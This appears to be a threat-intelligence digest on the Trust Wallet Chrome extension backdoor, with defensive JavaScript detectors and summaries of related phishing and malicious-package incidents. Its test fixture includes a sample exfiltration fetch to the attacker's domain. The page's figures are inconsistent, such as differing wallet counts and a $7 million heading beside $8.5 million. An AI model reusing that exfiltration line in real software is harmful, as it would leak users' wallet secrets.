
Sha1-Hulud Supply Chain Attack Results in $8.5 Million Trust Wallet Chrome Extension Hack

2 unique sources, 5 articles

Summary


On December 24, 2025, users of the Trust Wallet Chrome extension reported significant cryptocurrency losses after a compromised update (version 2.68.0) was released. The update contained malicious code that exfiltrated sensitive wallet data to an external server. Trust Wallet confirmed the security incident and released a patched version (2.69). Losses are estimated to exceed $8.5 million, with ongoing investigations into the incident.

The malicious code iterated through all wallets stored in the extension and triggered a mnemonic phrase request for each wallet. The encrypted mnemonic was decrypted using the password or passkey entered during wallet unlock and sent to the attacker's server. The stolen funds include about $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum; they have since been moved through centralized exchanges and cross-chain bridges for laundering and swapping.

The backdoor originated from malicious source code modification within the internal Trust Wallet extension codebase. The attacker directly tampered with the application's own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel. There is a possibility that the incident is the work of a nation-state actor, and Changpeng Zhao hinted that the exploit was most likely carried out by an insider.

The incident has claimed hundreds of victims, and Trust Wallet is actively finalizing the process to refund the impacted users. Trust Wallet confirmed that approximately 2,596 wallets were drained in the attack and received around 5,000 claims, indicating a significant number of false or duplicate submissions. Trust Wallet has launched a dedicated claim form for affected users and warned about ongoing phishing campaigns.
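The summary above describes a legitimate analytics library being turned into the exfiltration channel for decrypted seed phrases. The following is an added example, not Trust Wallet's or PostHog's code, of the kind of egress check a wallet vendor (or a proxy in front of the extension's telemetry) can run over outbound analytics events: every event must go to an allow-listed analytics host, and no property value may look like a BIP-39 seed phrase. The allow-listed host, the sample events and the word sequence are constructed for this example; the only page-sourced value is the exfil domain named in the timeline.

```javascript
// Added example (not Trust Wallet or PostHog code): a DLP-style check over
// outbound analytics events. Two checks per event:
//   1. the destination host is an explicitly allow-listed analytics endpoint;
//   2. no property value looks like a BIP-39 seed phrase.

// Assumption for the example: the only legitimate telemetry sink.
const ALLOWED_ANALYTICS_HOSTS = new Set(['app.posthog.com']);

// Heuristic, not a dictionary check: BIP-39 phrases are 12, 15, 18, 21 or 24
// lowercase words of 3 to 8 letters. Tune or replace with a word-list check.
function looksLikeMnemonic(value) {
  if (typeof value !== 'string') return false;
  const words = value.trim().split(/\s+/);
  if (![12, 15, 18, 21, 24].includes(words.length)) return false;
  return words.every((w) => /^[a-z]{3,8}$/.test(w));
}

// Walk nested properties and return the key paths whose value looks like a seed phrase.
function findMnemonicPaths(obj, prefix = '') {
  if (obj === null || typeof obj !== 'object') {
    return looksLikeMnemonic(obj) ? [prefix || '$'] : [];
  }
  const hits = [];
  for (const [key, value] of Object.entries(obj)) {
    hits.push(...findMnemonicPaths(value, prefix ? `${prefix}.${key}` : key));
  }
  return hits;
}

// Findings for one event; an empty array means the event may leave the host.
function checkEvent(event) {
  const findings = [];
  let host;
  try {
    host = new URL(event.url).hostname;
  } catch {
    return [`unparseable destination: ${event.url}`];
  }
  if (!ALLOWED_ANALYTICS_HOSTS.has(host)) {
    findings.push(`destination not allow-listed: ${host}`);
  }
  for (const path of findMnemonicPaths(event.properties || {})) {
    findings.push(`seed-phrase-like value at properties.${path}`);
  }
  return findings;
}

// Returns only the events that produced findings, with their position in the batch.
function auditEvents(events) {
  return events
    .map((event, index) => ({ index, event: event.event, findings: checkEvent(event) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample traffic (not real data). The second event targets the
// exfil domain named on this page (metrics-trustwallet[.]com, written
// undefanged so URL parsing works) and carries the first twelve BIP-39 words,
// a well-known test vector rather than a real wallet.
const SAMPLE_EVENTS = [
  { url: 'https://app.posthog.com/capture/', event: 'wallet_opened',
    properties: { screen: 'home', count: 2 } },
  { url: 'https://metrics-trustwallet.com/capture/', event: 'wallet_opened',
    properties: { meta: { m: 'abandon ability able about above absent absorb abstract absurd abuse access accident' } } },
];

console.log(JSON.stringify(auditEvents(SAMPLE_EVENTS), null, 2));
```

The host allow-list is the control that matters most here: an analytics SDK whose endpoint is a runtime configuration value will happily post to any host, so pin the endpoint in the build and alert on anything else. The mnemonic heuristic is a second line of defence and will not catch encoded or chunked payloads; treat a hit as a reason to block and investigate, not as the only signal.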

Timeline

  1. 31.12.2025 18:29 · 1 article

    Sha1-Hulud Supply Chain Attack Responsible for Trust Wallet Hack

    Trust Wallet revealed that the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, resulting in the theft of approximately $8.5 million in assets. The attacker gained access to Trust Wallet's browser extension source code and the Chrome Web Store (CWS) API key through exposed Developer GitHub secrets. The attacker registered the domain 'metrics-trustwallet[.]com' and pushed a trojanized version of the extension with a backdoor capable of harvesting users' wallet mnemonic phrases.

  2. 26.12.2025 17:31 · 3 articles

    Trust Wallet Confirms $7 Million Impact and Refund Process

    Trust Wallet confirmed that approximately $8.5 million has been impacted and will refund affected users. The stolen funds have been moved through centralized exchanges and cross-chain bridges for laundering and swapping. The backdoor incident originated from malicious source code modification within the internal Trust Wallet extension codebase. The attacker directly tampered with the application's own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel. There is a possibility that the incident is the work of a nation-state actor, and Changpeng Zhao hinted that the exploit was most likely carried out by an insider.

  3. 26.12.2025 11:47 · 5 articles

    Trust Wallet Chrome Extension Exploit Leads to Millions in Crypto Losses

    Trust Wallet confirmed that approximately 2,520 wallets were drained in the attack, with around 5,000 claims received, indicating a significant number of false or duplicate submissions. The company has launched a dedicated claim form for affected users and warned about ongoing phishing campaigns. Trust Wallet has also taken steps to block further attempts to release new versions and has reported the malicious exfiltration domain to NiceNIC, which promptly suspended it.

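The timeline above gives three concrete facts a defender can check against an installed copy of the extension: the compromised release is 2.68.0, the patched release is 2.69, and the trojanized build talked to metrics-trustwallet[.]com. The following is an added example, not Trust Wallet's or Google's code, of a static audit over an unpacked extension supplied as a map of file path to file contents (read the directory under the browser profile into such a map, or unzip the .crx). The expected-hosts list, sample manifests and sample scripts are constructed for this example.

```javascript
// Added example, not Trust Wallet's or Google's code: static audit of an
// unpacked Chrome extension. Input is a map of relative path -> file text.
// Checks, drawn from the incident timeline above:
//   - manifest version is the compromised release, or predates the patch;
//   - host permissions outside an operator-supplied allow-list (or <all_urls>);
//   - any bundled script or page references the known exfil domain.

const COMPROMISED_VERSION = '2.68.0';   // from the timeline
const PATCHED_VERSION = '2.69';         // from the timeline
const KNOWN_EXFIL_DOMAINS = ['metrics-trustwallet.com']; // page IoC, written undefanged

// Numeric comparison of dotted version strings; missing components count as 0.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] ?? 0;
    const y = pb[i] ?? 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Host part of a match pattern such as "https://*.example.com/*" -> "*.example.com".
function hostOfPattern(pattern) {
  const m = /^[a-z*]+:\/\/([^/]+)/i.exec(pattern);
  return m ? m[1] : pattern;
}

function auditExtension(files, expectedHosts) {
  const findings = [];
  const manifestText = files['manifest.json'];
  if (!manifestText) return ['manifest.json missing'];
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch {
    return ['manifest.json is not valid JSON'];
  }

  // 1. Version check.
  const version = String(manifest.version ?? '');
  if (version === COMPROMISED_VERSION) {
    findings.push(`version ${version} is the compromised release`);
  } else if (compareVersions(version, PATCHED_VERSION) < 0) {
    findings.push(`version ${version} predates the patched release ${PATCHED_VERSION}`);
  }

  // 2. Host permissions. MV3 lists them in host_permissions; MV2 mixed them into permissions.
  const allowed = new Set(expectedHosts);
  const grants = [...(manifest.host_permissions ?? []), ...(manifest.permissions ?? [])];
  for (const p of grants) {
    if (p === '<all_urls>') { findings.push('grants <all_urls>'); continue; }
    if (!/:\/\//.test(p)) continue; // API permissions such as "storage" have no scheme
    if (!allowed.has(hostOfPattern(p))) findings.push(`unexpected host permission: ${p}`);
  }

  // 3. IoC sweep over scripts and pages.
  for (const [path, content] of Object.entries(files)) {
    if (path === 'manifest.json' || !/\.(m?js|json|html)$/i.test(path)) continue;
    for (const domain of KNOWN_EXFIL_DOMAINS) {
      if (content.includes(domain)) findings.push(`${path} references exfil domain ${domain}`);
    }
  }
  return findings;
}

// Constructed sample packages (not real extension contents).
const EXPECTED_HOSTS = ['app.posthog.com']; // assumption: the vendor's only legitimate telemetry host
const CLEAN_FILES = {
  'manifest.json': JSON.stringify({ manifest_version: 3, name: 'Example Wallet', version: '2.69',
    permissions: ['storage'], host_permissions: ['https://app.posthog.com/*'] }),
  'background.js': 'console.log("ok");',
};
const TROJANIZED_FILES = {
  'manifest.json': JSON.stringify({ manifest_version: 3, name: 'Example Wallet', version: '2.68.0',
    permissions: ['storage'], host_permissions: ['https://app.posthog.com/*', 'https://metrics-trustwallet.com/*'] }),
  'background.js': 'fetch("https://metrics-trustwallet.com/capture/", { method: "POST" });',
};

console.log('clean:', auditExtension(CLEAN_FILES, EXPECTED_HOSTS));
console.log('trojanized:', auditExtension(TROJANIZED_FILES, EXPECTED_HOSTS));
```

The IoC sweep is the weakest of the three checks, since a domain string can be split, encoded or fetched at runtime; the version and host-permission checks do not depend on how the payload was written. Note also that a malicious update need not add a new host permission when the legitimate analytics host is already granted, which is exactly why the egress check in the earlier example is worth running as well.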


Similar Happenings

OAuth Device Code Phishing Campaigns Target Microsoft 365 Accounts

A surge in phishing campaigns exploiting Microsoft’s OAuth device code authorization flow has been observed, targeting Microsoft 365 accounts. Both state-aligned and financially motivated actors are using social engineering to trick users into approving malicious applications, leading to account takeover and data theft. The attacks leverage the OAuth 2.0 device authorization grant, a legitimate process designed for devices with limited input capabilities. Once victims enter a device code generated by an attacker-controlled application, the threat actor receives a valid access token, granting control over the compromised account. The campaigns use QR codes, embedded buttons, and hyperlinked text to initiate the attack chain, often claiming to involve document sharing, token reauthorization, or security verification.

The growth of these campaigns is linked to readily available phishing tools like SquarePhish2 and Graphish, which simplify device code abuse and require limited technical skill. Proofpoint observed the financially motivated actor TA2723 and the Russia-linked cluster it tracks as UNK_AcademicFlare adopting this technique against various sectors in the US and Europe. The UNK_AcademicFlare activity, ongoing since September 2025, uses compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe. The adversary claims to share a link to a document that includes questions or topics for the email recipient to review before a meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender's Microsoft OneDrive account and instructs the victim to copy the provided code and click 'Next' to access the supposed document.

Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish.

Organizations are advised to strengthen OAuth controls and train users to avoid entering device codes from untrusted sources. The best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that is not feasible, use a policy with an allow-list approach that permits device code authentication only for approved users, operating systems, or IP ranges.
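The mitigation above is a Conditional Access policy that blocks device code flow for all users. A tenant usually has dozens of policies, some report-only and some with exclusions, so it is worth checking an export rather than trusting a policy name. The following is an added example, not Microsoft tooling, that evaluates a list of exported policy objects and reports whether any enabled policy blocks device code flow for all users without exclusions. The field names follow the Microsoft Graph beta conditionalAccessPolicy shape as understood here (conditions.authenticationFlows.transferMethods, grantControls.builtInControls, conditions.users.includeUsers); verify them against your own tenant's export before relying on the result. The sample policies are constructed.

```javascript
// Added example, not Microsoft tooling: does any enabled Conditional Access
// policy block device code flow for all users with no exclusions?
// Field names assume the Graph beta conditionalAccessPolicy shape; check them
// against a real export (e.g. GET /beta/identity/conditionalAccess/policies).

function mentionsDeviceCode(policy) {
  const methods = policy.conditions?.authenticationFlows?.transferMethods ?? '';
  return methods.split(',').map((s) => s.trim()).includes('deviceCodeFlow');
}

// True only for an enforced block of deviceCodeFlow that includes "All" users
// and excludes nobody. Exclusions (even break-glass accounts) make it partial.
function policyBlocksDeviceCode(policy) {
  if (policy.state !== 'enabled') return false;
  if (!mentionsDeviceCode(policy)) return false;
  if (!(policy.grantControls?.builtInControls ?? []).includes('block')) return false;
  const users = policy.conditions?.users ?? {};
  const coversAll = (users.includeUsers ?? []).includes('All');
  const hasExclusions = (users.excludeUsers ?? []).length > 0
    || (users.excludeGroups ?? []).length > 0
    || (users.excludeRoles ?? []).length > 0;
  return coversAll && !hasExclusions;
}

// Summary over a policy export: which policies fully block device code flow,
// and which mention it but fall short (report-only, disabled, exclusions, non-block grant).
function deviceCodeCoverage(policies) {
  const blocking = policies.filter(policyBlocksDeviceCode).map((p) => p.displayName);
  const partial = policies
    .filter((p) => mentionsDeviceCode(p) && !policyBlocksDeviceCode(p))
    .map((p) => p.displayName);
  return { blockedForAllUsers: blocking.length > 0, blocking, partial };
}

// Constructed sample export: a report-only policy, a pilot with an excluded
// group, and an unrelated MFA policy. None of them fully blocks the flow.
const SAMPLE_POLICIES = [
  { displayName: 'Block device code - report only', state: 'enabledForReportingButNotEnforced',
    conditions: { users: { includeUsers: ['All'] }, authenticationFlows: { transferMethods: 'deviceCodeFlow' } },
    grantControls: { operator: 'OR', builtInControls: ['block'] } },
  { displayName: 'Block device code - pilot', state: 'enabled',
    conditions: { users: { includeUsers: ['All'], excludeGroups: ['<constructed-pilot-group-id>'] },
      authenticationFlows: { transferMethods: 'deviceCodeFlow,authenticationTransfer' } },
    grantControls: { operator: 'OR', builtInControls: ['block'] } },
  { displayName: 'Require MFA for all users', state: 'enabled',
    conditions: { users: { includeUsers: ['All'] } },
    grantControls: { operator: 'OR', builtInControls: ['mfa'] } },
];

// The policy the text recommends: enforced, block, all users, no exclusions.
const FIXED_POLICY = {
  displayName: 'Block device code flow', state: 'enabled',
  conditions: { users: { includeUsers: ['All'] }, authenticationFlows: { transferMethods: 'deviceCodeFlow' } },
  grantControls: { operator: 'OR', builtInControls: ['block'] },
};

console.log(deviceCodeCoverage(SAMPLE_POLICIES));
console.log(deviceCodeCoverage([...SAMPLE_POLICIES, FIXED_POLICY]));
```

A policy that lands in `partial` is not necessarily wrong: many tenants exclude break-glass accounts from every blocking policy by design. The point of listing them separately is to force a review of each exclusion, since an excluded group is exactly where an attacker who has already phished one account will look for a user who can still complete device code flow.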

Malicious NuGet Package Tracer.Fody.NLog Steals Cryptocurrency Wallet Data

A malicious NuGet package named "Tracer.Fody.NLog" has been discovered, impersonating the legitimate "Tracer.Fody" library. The package, available for nearly six years, steals cryptocurrency wallet data from Stratis wallets and exfiltrates it to a Russian-controlled server. It has been downloaded over 2,000 times, with recent downloads occurring in the last six weeks. The threat actor used typosquatting and Cyrillic lookalike characters to evade detection. The package scans the default Stratis wallet directory on Windows, reads wallet files, and exfiltrates data silently without disrupting the host application. The same IP address was previously used in another NuGet impersonation attack in December 2023. Defenders are advised to be vigilant against similar threats targeting .NET projects.

ShadyPanda Browser Extensions Campaign Exploits 4.3M Installs

The ShadyPanda campaign has amassed over 4.3 million installations of malicious Chrome and Edge browser extensions, evolving from legitimate tools into spyware over multiple phases. The extensions, discovered by Koi Security, engaged in affiliate fraud, search hijacking, and remote code execution. The campaign remains active on the Microsoft Edge Add-ons platform, with one extension having 3 million installs. The extensions collect browsing history, search queries, keystrokes, mouse clicks, and other sensitive data, exfiltrating it to domains in China. Users are advised to remove these extensions and reset their account passwords. The ShadyPanda campaign used a supply-chain attack tactic by publishing or acquiring harmless extensions, letting them run clean for years to build trust and gain millions of installs, then suddenly flipping them into malware via silent updates. The compromised extensions became a fully fledged remote code execution (RCE) framework inside the browser, capable of downloading and running arbitrary JavaScript with full access to the browser's data and capabilities. The extensions could steal session cookies and tokens, allowing them to impersonate entire SaaS accounts such as Microsoft 365 or Google Workspace. The risk of malicious browser extensions extends beyond individual users, as they can access cookies, local storage, cloud auth sessions, active web content, and file downloads, blurring the line between endpoint security and cloud security. Organizations should enforce extension allow lists, treat extension access like OAuth access, audit extension permissions regularly, and monitor for suspicious extension behavior to reduce the risk of malicious extensions. Modern SaaS security platforms, such as Reco's Dynamic SaaS Security platform, can help organizations monitor and detect suspicious activity related to browser extensions in real time.

Malicious Chrome Extension Crypto Copilot Injects Hidden Solana Transfer Fees

A malicious Chrome extension named Crypto Copilot has been discovered injecting hidden Solana (SOL) transfer fees into Raydium swap transactions. The extension, available on the Chrome Web Store, siphons a minimum of 0.0013 SOL or 0.05% of the trade amount to an attacker-controlled wallet. The extension remains available with 12 installs as of November 2025, and its malicious behavior is concealed through obfuscation techniques. The extension communicates with a fake backend domain and uses legitimate services to appear trustworthy, while silently transferring fees to the attacker's wallet without user awareness.

FBI Warns of $262M Stolen in Account Takeover Fraud Schemes

Since January 2025, cybercriminals impersonating bank support teams have stolen over $262 million through account takeover (ATO) fraud schemes. The FBI's Internet Crime Complaint Center (IC3) has received over 5,100 complaints, affecting individuals and businesses across various sectors. Criminals gain unauthorized access to online financial accounts using social engineering techniques or fraudulent websites. Once in control, they wire funds to crypto wallets and often change account passwords, making recovery difficult. The FBI advises monitoring financial accounts, using strong passwords, enabling MFA, and avoiding search results for banking websites. Victims are urged to contact their financial institutions immediately and file complaints with the IC3. Recent reports highlight the growing use of AI-powered phishing campaigns, SEO poisoning, and exploitation of e-commerce vulnerabilities, particularly ahead of the holiday season. Additionally, purchase scams and mobile phishing (mishing) sites have seen a significant increase, leveraging trusted brand names to deceive users. The U.S. Justice Department (DoJ) has seized the fraud domain web3adspanels[.]org, which was used to host and manipulate illegally harvested bank login credentials. The scheme targeted 19 victims across the U.S., including two companies in the Northern District of Georgia, with attempted losses of approximately $28 million and actual losses of approximately $14.6 million. The confiscated domain stored the stolen login credentials of thousands of victims and hosted a backend server to facilitate takeover fraud as recently as November 2025. The FBI and Estonian law enforcement collaborated in this seizure, and the domain now displays a law enforcement banner indicating it is under the control of authorities. No arrests have been made yet, but the investigation may reveal clues leading to the operators.